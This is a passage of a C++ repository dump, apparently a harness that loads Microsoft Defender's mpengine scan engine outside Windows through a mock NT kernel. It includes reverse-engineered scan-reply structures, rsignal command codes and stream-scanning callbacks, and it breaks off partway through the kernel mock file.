sizeof(char16_t); 69 | new_str = new uint8_t[l + 2]; 70 | memset(new_str, 0, (l + 2)); 71 | memmove(new_str, _str, l); 72 | 73 | return (char16_t*)new_str; 74 | } 75 | 76 | vector split_string(char* str, char delimiter) { 77 | vector v; 78 | string str_tmp = string(str); 79 | int sp = 0; 80 | int pos = 0; 81 | 82 | for (pos; str_tmp.length() > pos; pos++) { 83 | char c = str_tmp[pos]; 84 | if (c == delimiter) { 85 | v.push_back(str_tmp.substr(sp, pos-sp)); 86 | sp = pos + 1; 87 | } 88 | } 89 | v.push_back(str_tmp.substr(sp, pos - sp)); 90 | 91 | return v; 92 | } 93 | 94 | uint32_t copy_str_to_wstr(char* src, char16_t* dst, uint32_t str_len) { 95 | /*src is null-terminated string*/ 96 | int i = 0; 97 | for (i = 0; src[i] != '\0' && str_len > i; i++) { 98 | dst[i] = src[i]; 99 | } 100 | dst[i++] = '\0'; 101 | return i; 102 | } 103 | 104 | int compare_wstr(char16_t* targ1, char16_t* targ2){ 105 | int idx = 0; 106 | int delta = 0; 107 | char16_t s1; 108 | char16_t s2; 109 | while (true) { 110 | s1 = targ1[idx]; 111 | s2 = targ2[idx]; 112 | delta = s1 - s2; 113 | if(delta == 0){ 114 | if(s1 == '\0' && s2 == '\0') 115 | return 0; 116 | else{ 117 | idx++; 118 | continue; 119 | } 120 | } 121 | else{ 122 | return delta; 123 | } 124 | } 125 | 126 | } 127 | 128 | uint32_t copy_wstr_to_str(char16_t* src, char* dst, uint32_t max_len) { 129 | /*src is null-terminated string*/ 130 | int i = 0; 131 | for (i = 0; src[i] != '\0' && max_len > i; i++) { 132 | dst[i] = (char)src[i]; 133 | } 134 | dst[i++] = '\0'; 135 | return i; 136 | } 137 | 138 | size_t get_wide_string_length(void* ptr) { 139 | size_t i = 0; 140 | char16_t *p = (char16_t*)ptr; 141 | 142 | if (!p) return 0; 143 | 144 | while (*p++) 145 | i++; 146 | 147 | return i; 148 | } 149 | 150 | void debug_log(const char* fmt, ...) { 151 | #if defined(__LOG__) 152 | #define MAX_BUF_SIZE 4096 153 | va_list ap; 154 | char buf[MAX_BUF_SIZE]; 155 | va_start(ap, fmt); 156 | vsprintf(buf, fmt, ap); 157 | va_end(ap); 158 | fprintf(stdout, "[%s] %s", __FUNCTION__, buf); 159 | #endif 160 | return; 161 | } 162 | -------------------------------------------------------------------------------- /wrapper.hpp: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _RSIG_WRAPPER_ 3 | #define _RSIG_WRAPPER_ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #include "cb/cb.h" 10 | #include "mpcore/engineboot.h" 11 | #include "mpcore/openscan.h" 12 | #include "mpcore/rsignal.h" 13 | #include "mpcore/streambuffer.h" 14 | #include "log.hpp" 15 | #include "winapi/dlls/include/windows.h" 16 | 17 | #define _ZEROMEMORY_(buf, sz) memset(buf, 0, sz) 18 | 19 | using namespace std; 20 | 21 | 22 | class RsignalWrapper { 23 | typedef uint32_t(__cdecl *__rsignal)(void** hKrnl, uint32_t flag, void* bootOption, uint32_t size); 24 | typedef uint64_t(__cdecl * notify_cb)(SCAN_REPLY* scan_reply); 25 | 26 | private: 27 | ENGINE_CONFIG engine_config; 28 | StreamBufferScanData scan_params; 29 | CCftScanState scan_state; 30 | BOOTENGINE_PARAMS boot_params; 31 | StreamBufferDescriptor stream_buffer_descriptor; 32 | ENGINE_INFO engine_info; 33 | public: 34 | __rsignal _rsignal = nullptr; 35 | notify_cb cb = nullptr; 36 | u16string signature_location; 37 | void* kernel_handle; 38 | function set_notify_cb = [this](void* cb) { 39 | this->cb = (notify_cb)cb; 40 | this->scan_state.ClientNotifyCallback = this->cb; 41 | }; 42 | function set_rsignal = [this](void* rsignal_addr) { 43 | this->_rsignal = (__rsignal)rsignal_addr; 44 | }; 45 | function set_vdm_location = [this](string loc) { 46 | this->signature_location.assign(loc.begin(), loc.end()); 47 | this->boot_params.SignatureLocation = (char16_t*)signature_location.c_str(); 48 | }; 49 | 50 | function rsig_boot_engine = [this]() { 51 | if (this->signature_location.empty()) { 52 | console_log(MSGTYPE::CRIT, "Please set signature location first, show RsignalWrapper::set_vdm_location"); 53 | return false; 54 | } 55 | 56 | console_log(MSGTYPE::INFO, "now.. engine will boot.."); 57 | 58 | uint32_t res = this->_rsignal( 59 | &this->kernel_handle, 60 | RSIG_BOOTENGINE, 61 | &this->boot_params, 62 | sizeof(BOOTENGINE_PARAMS) 63 | ); 64 | 65 | console_log(MSGTYPE::INFO, "engine boot success!!"); 66 | 67 | if (res) { 68 | if (res >= 32700 && res < 40000) { 69 | console_log(MSGTYPE::INFO, "Error occured by invalid parameter\n"); 70 | console_log(MSGTYPE::ERR, "Check the parameter version or it's structure\n"); 71 | } 72 | else if (res >= 40000) { 73 | console_log(MSGTYPE::INFO, "Error occured by invalid mpengine core version\n"); 74 | console_log(MSGTYPE::ERR, "Check that mpengine and signature database version match correctly\n"); 75 | } 76 | else { 77 | console_log(MSGTYPE::ERR, "Unknown error"); 78 | } 79 | return false; 80 | } 81 | return true; 82 | }; 83 | 84 | function rsig_scan_stream = [this](int fp) { 85 | if (this->cb == nullptr) { 86 | console_log(MSGTYPE::INFO, "Please set notify callback first"); 87 | return false; 88 | } 89 | this->stream_buffer_descriptor.UserPtr = fp; 90 | this->_rsignal( 91 | &this->kernel_handle, 92 | RSIG_SCAN_STREAMBUFFER, 93 | &this->scan_params, 94 | sizeof(StreamBufferScanData) 95 | ); 96 | return true; 97 | }; 98 | 99 | RsignalWrapper() { 100 | _ZEROMEMORY_(&this->engine_config, sizeof(ENGINE_CONFIG)); 101 | _ZEROMEMORY_(&this->scan_params, sizeof(StreamBufferScanData)); 102 | _ZEROMEMORY_(&this->scan_state, sizeof(CCftScanState)); 103 | _ZEROMEMORY_(&this->boot_params, sizeof(BOOTENGINE_PARAMS)); 104 | _ZEROMEMORY_(&this->stream_buffer_descriptor, sizeof(StreamBufferDescriptor)); 105 | _ZEROMEMORY_(&this->engine_info, sizeof(ENGINE_INFO)); 106 | this->kernel_handle = nullptr; 107 | 108 | this->stream_buffer_descriptor.Read = ReadStreamCb; 109 | this->stream_buffer_descriptor.GetSize = GetStreamSizeCb; 110 | this->stream_buffer_descriptor.GetName = GetStreamNameCb; 111 | 112 | this->scan_params.ScanState = &this->scan_state; 113 | this->scan_state.ScanFlag = SCAN_VIRUSFOUND | 0xFFFFFFF; // scan all 114 | this->scan_state.ClientNotifyCallback = nullptr; 115 | this->scan_params.Descriptor = &this->stream_buffer_descriptor; 116 | 117 | this->engine_config.EngineFlags = 1; 118 | this->boot_params.ClientVersion = BOOTENGINE_PARAMS_VERSION; 119 | this->boot_params.EngineInfo = &this->engine_info; 120 | this->boot_params.EngineConfig = &this->engine_config; 121 | this->boot_params.SignatureLocation = nullptr; 122 | }; 123 | }; 124 | 125 | #endif 126 | -------------------------------------------------------------------------------- /mpcore/rsignal.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | #ifndef __RSIGNAL_H 5 | #define __RESIGNAL_H 6 | 7 | #define RSIG_BASE 0x4000 8 | #define RSIG_UNKNOWN1 0x4003 9 | #define RSIG_GETEINFO 0x4004 // Internally Used 10 | #define RSIG_VIRINFO 0x4005 11 | #define RSIG_UNLOADENGINE 0x400A 12 | #define RSIG_SETUPENGINE 0x400B // Internally Used 13 | #define RSIG_SCANFILE_TS_W 0x4014 14 | #define RSIG_SCANPATH_TS_W 0x4015 15 | #define RSIG_INITENGINE 0x4019 // Internally Used 16 | #define RSIG_SETCLIENT_CONFIG 0x401A // Internally Used 17 | #define RSIG_RESERVED4 0x401C 18 | #define RSIG_FIW32_CONFIG 0x401D 19 | #define RSIG_SPLIT_VIRNAME 0x401E 20 | #define RSIG_HOOK_API 0x401F 21 | #define RSIG_INIT_ENGINE_CONTEXT 0x4020 22 | #define RSIG_CLEANUP_ENGINE_CONTEXT 0x4021 23 | #define RSIG_SCANFILE_TS_WCONTEXT 0x4023 24 | #define RSIG_SCANPATH_TS_WCONTEXT 0x4024 25 | #define RSIG_VIRINFO_FILTERED 0x4025 26 | #define RSIG_SCAN_OPEN 0x4026 27 | #define RSIG_SCAN_GETEVENT 0x4027 28 | #define RSIG_SCAN_CLOSE 0x4028 29 | #define RSIG_GET_THREAT_INFO 0x4030 30 | #define RSIG_SCANSTREAMW 0x4031 31 | #define RSIG_SCANSTREAMW_WCONTEXT 0x4032 32 | #define RSIG_CHECK_PRIVILEGES 0x4033 33 | #define RSIG_ADJUST_PRIVILEGES 0x4034 34 | #define RSIG_SET_FILECHANGEQUERY 0x4035 35 | #define RSIG_BOOTENGINE 0x4036 // Could externally Using 36 | #define RSIG_RTP_GETINITDATA 0x4037 37 | #define RSIG_RTP_SETEVENTCALLBACK 0x4038 38 | #define RSIG_RTP_NOTIFYCHANGE 0x4039 39 | #define RSIG_RTP_GETBEHAVIORCONTEXT 0x403A 40 | #define RSIG_RTP_SETBEHAVIORCONTEXT 0x403B 41 | #define RSIG_RTP_FREEBEHAVIORCONTEXT 0x403C 42 | #define RSIG_SCAN_STREAMBUFFER 0x403D 43 | #define RSIG_RTP_STARTBEHAVIORMONITOR 0x403E 44 | #define RSIG_RTP_STOPBEHAVIORMONITOR 0x403F 45 | #define RSIG_GET_SIG_DATA 0x4041 46 | #define RSIG_VALIDATE_FEATURE 0x4042 47 | #define RSIG_SET_CALLBACK 0x4043 48 | #define RSIG_OBFUSCATE_DATA 0x4044 49 | #define RSIG_DROP_BMDATA 0x4045 50 | #define RSIG_SCANEXTRACT 0x4046 51 | #define RSIG_CHANGE_SETTINGS 0x4047 52 | #define RSIG_RTSIG_DATA 0x4048 53 | #define RSIG_SYSTEM_REBOOT 0x4049 54 | #define RSIG_REVOKE_QUERY 0x4050 55 | #define RSIG_CHECK_EXCLUSIONS 0x4051 56 | #define RSIG_COMPLETE_INITIALIZATION 0x4052 57 | #define RSIG_STATE_CHANGE 0x4053 58 | #define RSIG_SEND_CALLISTO_TELEMETRY 0x4054 59 | #define RSIG_DYNAMIC_CONFIG 0x4055 60 | #define RSIG_SEND_EARLY_BOOT_DATA 0x4056 61 | #define RSIG_SCAN_TCG_LOG 0x4057 62 | #define RSIG_CANCEL_ENGINE_LOAD 0x4058 63 | #define RSIG_SQM_CONFIG 0x4059 64 | #define RSIG_SERVICE_NOTIFICATION 0x405A 65 | #define RSIG_SCAN_TCG_LOG_EX 0x405B 66 | #define RSIG_FREE_TCG_EXTENDED_DATA 0x405C 67 | #define RSIG_NOTIFY_MAINTENANCE_WINDOW_STATE 0x405D 68 | #define RSIG_SEND_REMOTE_ATTESTATION_DATA 0x405E 69 | #define RSIG_SUSPICIOUS_SCAN 0x405F 70 | #define RSIG_ON_CLOUD_COMPLETION 0x4060 71 | #define RSIG_CONTROL_SPLI 0x4061 72 | #define RSIG_THREAT_UPDATE_STATUS 0x4062 73 | #define RSIG_VERIFY_MACHINE_GUID 0x4063 74 | #define RSIG_NRI_UPDATE_STATE 0x4064 75 | #define RSIG_TPM_CONFIG 0x4065 76 | #define RSIG_GET_RESOURCE_INFO 0x4066 77 | #define RSIG_GET_ASYNC_QUEUE_LENGTH 0x4067 78 | #define RSIG_RTP_IMAGENAME_CONFIG 0x4068 79 | #define RSIG_SET_CUSTOM_SET_ID 0x4069 80 | #define RSIG_CONFIGURE_ROLES 0x4070 81 | #define RSIG_HOOK_WOW 0x4071 82 | #define RSIG_AMSI_SESSION_END 0x4072 83 | #define RSIG_RESOURCE_CONTEXT_CONSOLIDATION 0x4073 84 | 85 | #endif 86 | -------------------------------------------------------------------------------- /of-loadlib.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 소스 파일 20 | 21 | 22 | 소스 파일 23 | 24 | 25 | 소스 파일 26 | 27 | 28 | 소스 파일 29 | 30 | 31 | 소스 파일 32 | 33 | 34 | 소스 파일 35 | 36 | 37 | 소스 파일 38 | 39 | 40 | 소스 파일 41 | 42 | 43 | 소스 파일 44 | 45 | 46 | 소스 파일 47 | 48 | 49 | 소스 파일 50 | 51 | 52 | 소스 파일 53 | 54 | 55 | 소스 파일 56 | 57 | 58 | 소스 파일 59 | 60 | 61 | 소스 파일 62 | 63 | 64 | 소스 파일 65 | 66 | 67 | 소스 파일 68 | 69 | 70 | 소스 파일 71 | 72 | 73 | 74 | 75 | 헤더 파일 76 | 77 | 78 | 헤더 파일 79 | 80 | 81 | 헤더 파일 82 | 83 | 84 | 헤더 파일 85 | 86 | 87 | 헤더 파일 88 | 89 | 90 | 헤더 파일 91 | 92 | 93 | 헤더 파일 94 | 95 | 96 | 헤더 파일 97 | 98 | 99 | 헤더 파일 100 | 101 | 102 | 헤더 파일 103 | 104 | 105 | 헤더 파일 106 | 107 | 108 | 헤더 파일 109 | 110 | 111 | 헤더 파일 112 | 113 | 114 | 헤더 파일 115 | 116 | 117 | 헤더 파일 118 | 119 | 120 | 헤더 파일 121 | 122 | 123 | 헤더 파일 124 | 125 | 126 | 헤더 파일 127 | 128 | 129 | -------------------------------------------------------------------------------- /cb/cb.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #if defined(__APPLE__) || defined(__LINUX__) 6 | #include 7 | #include 8 | #include 9 | #endif 10 | #if defined(__LINUX__) || defined(__WINDOWS__) 11 | #include 12 | #if defined(__LINUX__) 13 | #include 14 | #endif 15 | #if defined(__WINDOWS__) 16 | #include 17 | #endif 18 | #endif 19 | #include "../winapi/strutils.hpp" 20 | #include 21 | #include "cb.h" 22 | 23 | static char16_t target_file[260] = {'\0',}; 24 | 25 | #ifdef _X86 26 | 27 | uint32_t BufferSize = 0; 28 | 29 | uint32_t FullScanNotifyCallback(PSCAN_REPLY Scan) 30 | { 31 | void* _this = NULL; 32 | 33 | if (Scan->Flags & SCAN_FILENAME) { 34 | printf("[%s] Scanning \"%s\"...\n", "INFO", Scan->FileName); 35 | } 36 | if (Scan->Flags & SCAN_PACKERSTART) { 37 | printf("[%s] Maybe packed using %s...\n", "INFO", Scan->FileName); 38 | } 39 | if (Scan->Flags & SCAN_ENCRYPTED) { 40 | printf("File is encrypted\n"); 41 | } 42 | if (Scan->Flags & SCAN_CORRUPT) { 43 | printf("File may be corrupt\n"); 44 | } 45 | if (Scan->Flags & SCAN_FILETYPE) { 46 | printf("[%s] %s identified at %s\n", Scan->VirusName, Scan->FileName); 47 | } 48 | if (Scan->Flags & 0x08000022) { 49 | printf("[%s] %s detected!\n", "INFO", Scan->VirusName); 50 | } 51 | 52 | if (Scan->Flags & SCAN_NORESULT) { 53 | printf("No Threat identified"); 54 | } 55 | 56 | return 0; 57 | } 58 | 59 | uint32_t ReadStreamCb(uint32_t fd, unsigned long long Offset, void* Buffer, uint32_t Size, uint32_t* SizeRead) 60 | { 61 | _lseek(fd, Offset, SEEK_SET); 62 | *SizeRead = _read(fd, Buffer, Size); 63 | return 1; 64 | } 65 | 66 | uint32_t GetStreamSizeCb(uint32_t fd, uint32_t* FileSize) 67 | { 68 | _lseek(fd, 0, SEEK_END); 69 | *FileSize = _lseek(fd, 0, SEEK_CUR); 70 | return 1; 71 | } 72 | 73 | uint32_t GetIncremBufferSizeCb(void* buf, uint32_t* BufSize) { 74 | BufferSize += 0x1000; 75 | *BufSize = BufferSize; 76 | 77 | return 1; 78 | } 79 | 80 | uint32_t ReadBufferCb(void* src, unsigned long long Offset, void* Buffer, uint32_t Size, uint32_t* SizeRead) { 81 | memcpy(Buffer, (void*)((uint8_t*)src + Offset), Size); 82 | *SizeRead = Size; 83 | return 1; 84 | } 85 | 86 | #elif _X64 87 | 88 | uint64_t BufferSize = 0; 89 | 90 | uint64_t __stdcall FullScanNotifyCallback(PSCAN_REPLY Scan) 91 | { 92 | void* _this = NULL; 93 | 94 | if (Scan->Flags & SCAN_FILENAME) { 95 | printf("[%s] Scanning \"%s\"...\n", "INFO", Scan->FileName); 96 | } 97 | if (Scan->Flags & SCAN_PACKERSTART) { 98 | printf("[%s] Maybe packed using %s...\n", "INFO", Scan->FileName); 99 | } 100 | if (Scan->Flags & SCAN_ENCRYPTED) { 101 | printf("File is encrypted\n"); 102 | } 103 | if (Scan->Flags & SCAN_CORRUPT) { 104 | printf("File may be corrupt\n"); 105 | } 106 | if (Scan->Flags & SCAN_FILETYPE) { 107 | printf("[%s] %s identified at %s\n", Scan->VirusName, Scan->FileName); 108 | } 109 | if (Scan->Flags & 0x08000022) { 110 | printf("[%s] %s detected!\n", "INFO", Scan->VirusName); 111 | } 112 | 113 | if (Scan->Flags & SCAN_NORESULT) { 114 | printf("No Threat identified"); 115 | } 116 | 117 | return 0; 118 | } 119 | 120 | uint64_t __stdcall ReadStreamCb(uint64_t fd, uint64_t Offset, void* Buffer, uint64_t Size, uint64_t* SizeRead) 121 | { 122 | #if defined(__WINDOWS__) 123 | _lseek(fd, Offset, SEEK_SET); 124 | *SizeRead = _read(fd, (uint8_t*)Buffer, Size); 125 | #else 126 | lseek(fd, Offset, SEEK_SET); 127 | *SizeRead = read(fd, (uint8_t*)Buffer, Size); 128 | #endif 129 | return 1; 130 | } 131 | 132 | uint64_t __stdcall GetStreamSizeCb(uint64_t fd, uint64_t* FileSize) 133 | { 134 | #if defined(__WINDOWS__) 135 | _lseek(fd, 0, SEEK_END); 136 | *FileSize = _lseek(fd, 0, SEEK_CUR); 137 | #else 138 | lseek(fd, 0, SEEK_END); 139 | *FileSize = lseek(fd, 0, SEEK_CUR); 140 | #endif 141 | return 1; 142 | } 143 | 144 | uint64_t __stdcall GetIncremBufferSizeCb(void* buf, uint64_t* BufSize) { 145 | BufferSize += 0x1000; 146 | *BufSize = BufferSize; 147 | 148 | return 1; 149 | } 150 | 151 | uint64_t __stdcall ReadBufferCb(void* src, uint64_t Offset, void* Buffer, uint32_t* Size, uint32_t* SizeRead) { 152 | memcpy(Buffer, (void*)((uint8_t*)src + Offset), *Size); 153 | *SizeRead = *Size; 154 | return 1; 155 | } 156 | #endif // _X86 157 | 158 | char16_t* __stdcall GetStreamNameCb(void* self) { 159 | #if defined(__WINDOWS__) 160 | HANDLE hFile = (HANDLE)_get_osfhandle((uint32_t)self); 161 | GetFinalPathNameByHandleW(hFile, (wchar_t*)target_file, MAX_PATH, VOLUME_NAME_DOS); 162 | std::u16string target_path(target_file); 163 | if (target_path.substr(0, 8).compare(u"\\\\?\\UNC\\") == 0) 164 | { 165 | // In case of a network path, replace `\\?\UNC\` with `\\`. 166 | target_path = u"\\" + target_path.substr(7); 167 | } 168 | else if (target_path.substr(0, 4).compare(u"\\\\?\\") == 0) 169 | { 170 | // In case of a local path, crop `\\?\`. 171 | target_path = target_path.substr(4); 172 | } 173 | memset(target_file, '\0', 260*sizeof(char16_t)); 174 | memmove(target_file, target_path.c_str(), target_path.length()*sizeof(char16_t)); 175 | 176 | #else 177 | char* fname_str = new char[260]; 178 | memset(fname_str, '\0', 260); 179 | if (fcntl((intptr_t)self, F_GETPATH, fname_str) != -1) 180 | copy_str_to_wstr(fname_str, target_file, strlen(fname_str)); 181 | #endif 182 | return target_file; 183 | } 184 | -------------------------------------------------------------------------------- /mpcore/scanreply.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | 5 | #ifndef __SCANREPLY_H 6 | #define __SCANREPLY_H 7 | #include 8 | #include "engineboot.h" 9 | #include "../winapi/dlls/include/windows.h" 10 | #pragma pack(push, 1) 11 | // These are just guesses based on observed behaviour. 12 | enum { 13 | SCAN_ENCRYPTED = 1 << 6, 14 | SCAN_MEMBERNAME = 1 << 7, 15 | SCAN_FILENAME = 1 << 8, 16 | SCAN_FILETYPE = 1 << 9, 17 | SCAN_PACKEREND = 1 << 12, 18 | SCAN_CORRUPT = 1 << 13, 19 | SCAN_UNKNOWN = 1 << 15, // I dunno what this means 20 | SCAN_ISARCHIVE = 1 << 16, 21 | SCAN_TOPLEVEL = 1 << 18, 22 | SCAN_PACKERSTART = 1 << 19, 23 | SCAN_NORESULT = 1 << 20, 24 | SCAN_VIRUSFOUND = 1 << 27, 25 | }; 26 | 27 | #if defined(_X86) 28 | 29 | typedef struct _SCAN_REPLY { // very very important structure!! 30 | /*0x0*/ uint32_t field_0; // 0xB6B7B8B9 31 | /*0x4*/ uint32_t Flags; 32 | /*0x8*/ char* FileName; 33 | /*0xC*/ char VirusName[28]; 34 | /*0x28*/ uint32_t field_28; 35 | /*0x2C*/ uint32_t field_2C; 36 | /*0x30*/ uint32_t field_30; 37 | /*0x34*/ uint32_t field_34; 38 | /*0x38*/ uint32_t field_38; 39 | /*0x3C*/ uint32_t field_3C; 40 | /*0x40*/ uint32_t field_40; 41 | /*0x44*/ uint32_t field_44; // this was originally reserved field 42 | /*0x48*/ uint32_t field_48; 43 | /*0x4C*/ uint32_t field_4C; 44 | /*0x50*/ uint32_t FileSize; 45 | /*0x54*/ uint32_t field_54; // if this fild is not 0, pefile_scan_mp is not working 46 | /*0x58*/ uint32_t UserPtr; 47 | /*0x5C*/ uint32_t field_5C; 48 | /*0x60*/ char* MaybeFileName2; 49 | /*0x64*/ WCHAR* StreamName1; 50 | /*0x68*/ WCHAR* StreamName2; 51 | /*0x6C*/ uint32_t field_6C; 52 | /*0x70*/ uint32_t ThreatId; // Can be passed back to GetThreatInfo 53 | /*0x74*/ uint32_t Reserved1; 54 | /*0x78*/ uint32_t Reserved2; 55 | /*0x7C*/ uint32_t Reserved3; 56 | /*0x80*/ uint32_t Reserved4; 57 | /*0x84*/ uint32_t Reserved5; 58 | /*0x88*/ uint32_t NullSHA1[5]; 59 | /*0x9C*/ uint32_t Reserved7; 60 | /*0xA0*/ PENGINE_CONFIG engine_config_t; 61 | /*0xA4*/ uint32_t Reserved8; 62 | /*0xA8*/ uint32_t Reserved9; 63 | /*0xAC*/ uint32_t Reserved10; 64 | /*0xB0*/ uint32_t Reserved11; 65 | /*0xB4*/ uint32_t Reserved12; 66 | /*0xB8*/ uint32_t Reserved13; 67 | /*0xBC*/ uint32_t Reserved14; 68 | /*0xC0*/ uint8_t Header[0x1000]; // First 0x1000 bytes of target file 69 | /*0x10C0*/ uint8_t Footer[0x1000]; // Last 0x1000 bytes of target file 70 | /*0x20C0*/ void* UfsPluginBase; 71 | /*0x20C4*/ void* UfsClientRequest; //PUFSCLIENT_REQUEST 72 | /*0x20C8*/ uint32_t Reserved15; 73 | /*0x20CC*/ void* scan_variable; // pe_var_t* 74 | /*0x20D0*/ void* UFSClientRequest; 75 | uint32_t UNK[0x7D0]; 76 | /*0x28A0*/ uint32_t Unknown20000000; //0x20000000 77 | /*0x28D0*/ uint32_t End_Signautre;//str::NONE 78 | /*0x28D4*/ uint32_t WTF1; 79 | /*0x2948*/ uint32_t WTF2; 80 | /*0x294C*/ uint32_t WTF3; 81 | /*0x2950*/ uint32_t WTF4; 82 | /*too big...*/ 83 | } SCAN_REPLY, *PSCAN_REPLY; 84 | 85 | #elif defined(_X64) 86 | typedef struct _SCAN_REPLY { // very very important structure!! 87 | /*0x0*/ uint32_t signature; // 0xB6B7B8B9 88 | /*0x4*/ uint32_t Flags; 89 | /*0x8*/ char* FileName; 90 | /*0x10*/ char VirusName[28]; 91 | /*0x2C*/ uint32_t field_28; 92 | /*0x30*/ uint32_t field_2C; 93 | /*0x34*/ uint32_t field_30; 94 | /*0x38*/ uint32_t field_34; 95 | /*0x3C*/ uint32_t field_38; 96 | /*0x40*/ uint32_t field_3C; 97 | /*0x44*/ uint32_t field_40; 98 | /*0x48*/ uint32_t field_44; // this was originally reserved field 99 | /*0x4C*/ uint32_t field_48; 100 | /*0x50*/ uint32_t FileSize; 101 | /*0x54*/ uint32_t field_50; 102 | /*0x58*/ uint32_t field_54; // if this fild is not 0, pefile_scan_mp is not working 103 | /*0x5C*/ void* UserPtr; 104 | /*0x64*/ uint32_t field_5C; 105 | /*0x68*/ char* MaybeFileName2; 106 | /*0x70*/ char16_t* StreamName1; 107 | /*0x78*/ char16_t* StreamName2; 108 | /*0x80*/ uint32_t field_6C; 109 | /*0x84*/ uint32_t ThreatId; // Can be passed back to GetThreatInfo 110 | /*0x88*/ uint32_t Reserved1; 111 | /*0x8C*/ uint32_t Reserved2; 112 | /*0x90*/ uint32_t Reserved3; 113 | /*0x94*/ uint32_t Reserved4; 114 | /*0x98*/ void* Reserved5; 115 | /*0xA0*/ uint32_t NullSHA1[5]; 116 | /*0xB4*/ uint32_t Reserved6; 117 | /*0xB8*/ PENGINE_CONFIG engine_config_t; 118 | /*0xC0*/ uint8_t Header[0x1000]; // First 0x1000 bytes of target file 119 | /*0x10C0*/ uint8_t Footer[0x1000]; // Last 0x1000 bytes of target file 120 | /*0x20C0*/ void* UfsPluginBase; 121 | /*0x20C4*/ void* UfsClientRequest; //PUFSCLIENT_REQUEST 122 | /*0x20CC*/ void* pe_var_t; // pe_var_t* 123 | /*0x20D0*/ void* UFSClientRequest; 124 | uint32_t UNK[0x7D0]; 125 | /*0x28A0*/ uint32_t Unknown20000000; //0x20000000 126 | /*0x28D0*/ uint8_t End_Signautre[4];//str::NONE 127 | /*0x28D4*/ uint32_t WTF1[0x1000]; 128 | /*too big...*/ 129 | } SCAN_REPLY, *PSCAN_REPLY; 130 | #endif // _X86 131 | 132 | #ifdef _X86 133 | typedef struct CCftScanState { 134 | uint32_t ( __stdcall *ClientNotifyCallback)(PSCAN_REPLY arg); 135 | uint32_t field_4; 136 | void* UserPtr; 137 | uint32_t ScanFlag; 138 | } CCftScanState, *PCCftScanState; 139 | #elif _X64 140 | typedef struct CCftScanState { 141 | uint64_t ( __stdcall *ClientNotifyCallback)(PSCAN_REPLY arg); 142 | uint64_t field_4; 143 | uint64_t UserPtr; 144 | uint64_t ScanFlag; 145 | } CCftScanState, *PCCftScanState; 146 | #endif // _X86 147 | #pragma pack(pop) 148 | #endif // __SCANREPLY_H 149 | 150 | -------------------------------------------------------------------------------- /winapi/ntoskrnl.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "ntoskrnl.h" 3 | 4 | uint16_t MockNTKrnl::major = 10; 5 | uint16_t MockNTKrnl::minor = 0; 6 | uint32_t MockNTKrnl::build_version = 19042; 7 | uint64_t MockNTKrnl::handle_count = 0x0188; 8 | uint64_t MockNTKrnl::engine_base = 0; 9 | Json::Value MockNTKrnl::mock_reg; 10 | uint32_t MockNTKrnl::page_alignment = 0x1000; 11 | 12 | 13 | map> MockNTKrnl::m_reg_handle; 14 | map 23 | > 24 | > MockNTKrnl::m_heap_handle; 25 | uint32_t MockNTKrnl::process_heap_handle; 26 | 27 | std::map MockNTKrnl::m_env_variable = { 28 | {"AllUsersProfile", "C:\\ProgramData"}, 29 | {"APPDATA", "C:\\Users\\orca\\AppData\\Roaming"}, 30 | {"LocalAppData", "C:\\Users\\dlfgu\\AppData\\Local"}, 31 | {"SYSTEMROOT", "C:\\Windows"}, 32 | {"TEMP", ".\\TEMP"}, 33 | {"UserProfile", "C:\\Users\\orca"}, 34 | {"windir", "C:\\Windows"}, 35 | {"CommonProgramFiles", "C:\\Program Files\\Common Files"}, 36 | {"ProgramFiles", "C:\\Program Files"}, 37 | {"ProgramFiles(x86)", "C:\\Program Files (x86)"}, 38 | {"Public", "C:\\Users\\Public"}, 39 | {"SYSTEMDRIVE", "C:"}, 40 | }; 41 | 42 | void MockNTKrnl::parse_mock_reg_info() { 43 | Json::Value _json; 44 | Json::CharReaderBuilder reader; 45 | ifstream json_stream; 46 | 47 | json_stream.open(this->mock_reg_path); 48 | if (!json_stream.is_open()) { 49 | assert(0); 50 | } 51 | auto bret = Json::parseFromStream(reader, json_stream, &_json, nullptr); 52 | if (bret == false) { 53 | assert(0); 54 | } 55 | this->mock_reg = _json; 56 | } 57 | 58 | uint64_t MockNTKrnl::CreateNewRegHandle(string hive, string key, Json::Value v) { 59 | if (!MockNTKrnl::mock_reg) { 60 | return 0xFFFFFFFF; 61 | } 62 | uint64_t hv = MockNTKrnl::handle_count += 4; 63 | MockNTKrnl::m_reg_handle[hv] = make_tuple(hive, key, v); 64 | 65 | return hv; 66 | } 67 | 68 | void MockNTKrnl::RemoveRegHandle(uint32_t hKey) { 69 | MockNTKrnl::m_reg_handle.erase(hKey); 70 | } 71 | 72 | #define INIT_SZ 0 73 | #define MAX_SZ 1 74 | #define CUR_SZ 2 75 | #define HEAP_LIST 3 76 | 77 | uint64_t MockNTKrnl::CreateNewHeapHandle(size_t init_sz, size_t max_sz) { 78 | /* 79 | "handle":{ 80 | "init_sz": ??, 81 | "max_sz": ??, 82 | "cur_sz" 83 | [("base_addr", "size"), ... ("base_addr", "size")] 84 | } 85 | if max_sz != 0 86 | heap is not fixed 87 | */ 88 | 89 | //uint64_t membase = (uint64_t)malloc(init_sz); 90 | uint64_t hv = MockNTKrnl::handle_count += 4; 91 | map m; 92 | tuple> new_t = {init_sz, max_sz, 0, m}; 93 | MockNTKrnl::m_heap_handle[hv] = new_t; 94 | 95 | return hv; 96 | } 97 | 98 | void* MockNTKrnl::AllocHeapMemory(uint64_t heap_handle, bool zeroize, size_t mem_size) { 99 | tuple> handle_info; 100 | handle_info = 